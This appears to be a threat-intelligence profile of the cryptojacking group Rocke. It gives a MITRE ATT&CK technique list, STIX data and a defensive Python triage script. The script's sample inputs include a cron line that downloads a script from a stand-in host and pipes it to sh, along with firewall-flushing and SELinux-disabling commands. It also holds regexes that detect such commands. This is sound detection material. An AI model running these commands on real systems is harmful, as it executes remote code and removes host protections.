Threat Actor Profile
High APT
Description

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

Confidence Score
90%
Known Aliases
Rocke
Tags
mitre-attack stix-2.1 intrusion-set
First Seen

Unknown

Last Updated

Unknown

Active Status
Active
Created

April 29, 2026

MITRE ATT&CK Techniques (36)
T1071 - Application Layer Protocol
Command and Control
T1071.001 - Web Protocols
Command and Control
T1102 - Web Service
Command and Control
T1102.001 - Dead Drop Resolver
Command and Control
T1105 - Ingress Tool Transfer
Command and Control
T1571 - Non-Standard Port
Command and Control
T1552.004 - Private Keys
Credential Access
T1014 - Rootkit
Defense Evasion
T1027 - Obfuscated Files or Information
Defense Evasion
T1027.002 - Software Packing
Defense Evasion
T1027.004 - Compile After Delivery
Defense Evasion
T1036.005 - Match Legitimate Resource Name or Locat…
Defense Evasion
T1055.002 - Portable Executable Injection
Defense Evasion
T1070.002 - Clear Linux or Mac System Logs
Defense Evasion
T1070.004 - File Deletion
Defense Evasion
T1070.006 - Timestomp
Defense Evasion
T1140 - Deobfuscate/Decode Files or Information
Defense Evasion
T1222.002 - Linux and Mac File and Directory Permis…
Defense Evasion
T1562.001 - Disable or Modify Tools
Defense Evasion
T1562.004 - Disable or Modify System Firewall
Defense Evasion
T1564.001 - Hidden Files and Directories
Defense Evasion
T1018 - Remote System Discovery
Discovery
T1046 - Network Service Discovery
Discovery
T1057 - Process Discovery
Discovery
T1082 - System Information Discovery
Discovery
T1518.001 - Security Software Discovery
Discovery
T1053.003 - Cron
Execution
T1059.004 - Unix Shell
Execution
T1059.006 - Python
Execution
T1496.001 - Compute Hijacking
Impact
T1190 - Exploit Public-Facing Application
Initial Access
T1021.004 - SSH
Lateral Movement
T1037 - Boot or Logon Initialization Scripts
Persistence
T1543.002 - Systemd Service
Persistence
T1547.001 - Registry Run Keys / Startup Folder
Persistence
T1574.006 - Dynamic Linker Hijacking
Persistence
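The list above is only a map of technique IDs. As an added illustration of how an analyst turns part of it into host triage (this is example code written for this page, not Rocke tooling, MITRE data or code from the Talos report), the script below checks text artefacts for three of the Linux techniques in the list: T1574.006 via the contents of /etc/ld.so.preload, T1053.003 via crontab entries that fetch-and-execute or run from temp or hidden paths, and T1562.004 / T1562.001 via firewall- and SELinux-disabling commands in a shell history. The regexes are generic heuristics of this example's own, not signatures of any specific Rocke malware; the SAMPLE_* inputs are constructed and are not real indicators.

```python
"""Offline triage for three Linux techniques from the profile's technique list:
T1574.006 (ld.so.preload hijack), T1053.003 (cron persistence) and
T1562.004 / T1562.001 (host firewall and SELinux turned off).

The regexes are this example's own generic heuristics, not signatures of any
specific Rocke tooling; the SAMPLE_* inputs are constructed for illustration.
"""
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique ID from the profile
    source: str     # artefact the line came from
    detail: str     # the offending line


def _lines(text: str):
    """Yield stripped, non-empty, non-comment lines."""
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#"):
            yield s


# T1574.006: /etc/ld.so.preload is empty or absent on most hosts, and any
# library listed there is loaded into every dynamically linked process,
# so every entry is worth a look.
def check_ld_preload(content: str, source: str = "/etc/ld.so.preload") -> list:
    return [Finding("T1574.006", source, f"preloaded library: {s}") for s in _lines(content)]


# T1053.003: cryptojacking droppers commonly persist as a cron job that
# re-downloads a script and pipes it into a shell, or that runs a binary
# from a temp or hidden directory. Hidden dirs under $HOME will also hit
# this heuristic; treat such hits as leads, not verdicts.
FETCH_AND_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b")
SUSPECT_PATH = re.compile(r"(?:^|\s)(?:/tmp|/var/tmp|/dev/shm|/\S*/\.[^/\s]+)")


def check_cron(content: str, source: str) -> list:
    findings = []
    for s in _lines(content):
        if FETCH_AND_EXEC.search(s):
            findings.append(Finding("T1053.003", source, f"fetch-and-execute job: {s}"))
        elif SUSPECT_PATH.search(s):
            findings.append(Finding("T1053.003", source, f"job runs from suspect path: {s}"))
    return findings


# T1562.004 / T1562.001: commands that flush or stop the host firewall, or put
# SELinux in permissive mode, as found in a shell history or a recovered script.
FIREWALL_OFF = re.compile(
    r"\b(?:iptables\s+(?:-F|--flush|-X|-P\s+\w+\s+ACCEPT)"
    r"|ufw\s+disable|systemctl\s+(?:stop|disable)\s+(?:firewalld|ufw|iptables))\b"
)
SELINUX_OFF = re.compile(r"\bsetenforce\s+0\b")


def check_shell_commands(content: str, source: str) -> list:
    findings = []
    for s in _lines(content):
        if FIREWALL_OFF.search(s):
            findings.append(Finding("T1562.004", source, f"host firewall disabled: {s}"))
        if SELINUX_OFF.search(s):
            findings.append(Finding("T1562.001", source, f"SELinux set permissive: {s}"))
    return findings


CRON_FILES = ("/etc/crontab", "/var/spool/cron/root", "/var/spool/cron/crontabs/root")


def _read(path: str):
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def triage_host() -> list:
    """Read-only pass over the live host; absent or unreadable files are skipped."""
    findings = []
    text = _read("/etc/ld.so.preload")
    if text is not None:
        findings += check_ld_preload(text)
    cron_paths = list(CRON_FILES)
    if os.path.isdir("/etc/cron.d"):
        cron_paths += [os.path.join("/etc/cron.d", n) for n in sorted(os.listdir("/etc/cron.d"))]
    for path in cron_paths:
        text = _read(path)
        if text is not None:
            findings += check_cron(text, path)
    text = _read(os.path.expanduser("~/.bash_history"))
    if text is not None:
        findings += check_shell_commands(text, "~/.bash_history")
    return findings


# Constructed sample artefacts (illustrative only, not real indicators).
SAMPLE_LD_PRELOAD = "/usr/local/lib/libexample.so\n"
SAMPLE_CRONTAB = """# constructed /etc/crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root (curl -fsSL http://example.invalid/x.sh || wget -q -O- http://example.invalid/x.sh) | sh
* * * * * root /tmp/.x/run.sh
"""
SAMPLE_HISTORY = "iptables -F\nufw disable\nsetenforce 0\nls -la /root\n"


def run_samples() -> list:
    """Run the three checks over the constructed samples and return the findings."""
    return (check_ld_preload(SAMPLE_LD_PRELOAD)
            + check_cron(SAMPLE_CRONTAB, "/etc/crontab")
            + check_shell_commands(SAMPLE_HISTORY, "~/.bash_history"))


if __name__ == "__main__":
    for f in run_samples():
        print(f"{f.technique}  {f.source}: {f.detail}")
```

Run it as-is to see the findings for the constructed samples; call triage_host() instead to run the same checks read-only against the machine it is executed on (it needs permission to read the root crontabs). Each finding carries the technique ID so the output can be dropped straight into an ATT&CK-mapped incident note.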
STIX Data
{
  "aliases": ["Rocke"],
  "created": "2020-05-26T14:20:20.623Z",
  "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
  "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)",
  "external_references": [
    {
      "external_id": "G0106",
      "source_name": "mitre-attack",
      "url": "https://attack.mitre.org/groups/G0106"
    },
    {
      "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.",
      "source_name": "Talos Rocke August 2018",
      "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html"
    }
  ],
  "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
  "modified": "2025-04-25T14:49:08.821Z",
  "name": "Rocke",
  "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"],
  "spec_version": "2.1",
  "type": "intrusion-set",
  "x_mitre_attack_spec_version": "3.2.0",
  "x_mitre_deprecated": false,
  "x_mitre_domains": ["enterprise-attack"],
  "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
  "x_mitre_version": "1.0"
}
Related TTPs (36)
Application Layer Protocol
Command and Control

Web Protocols
Command and Control

Web Service
Command and Control

Dead Drop Resolver
Command and Control

Ingress Tool Transfer
Command and Control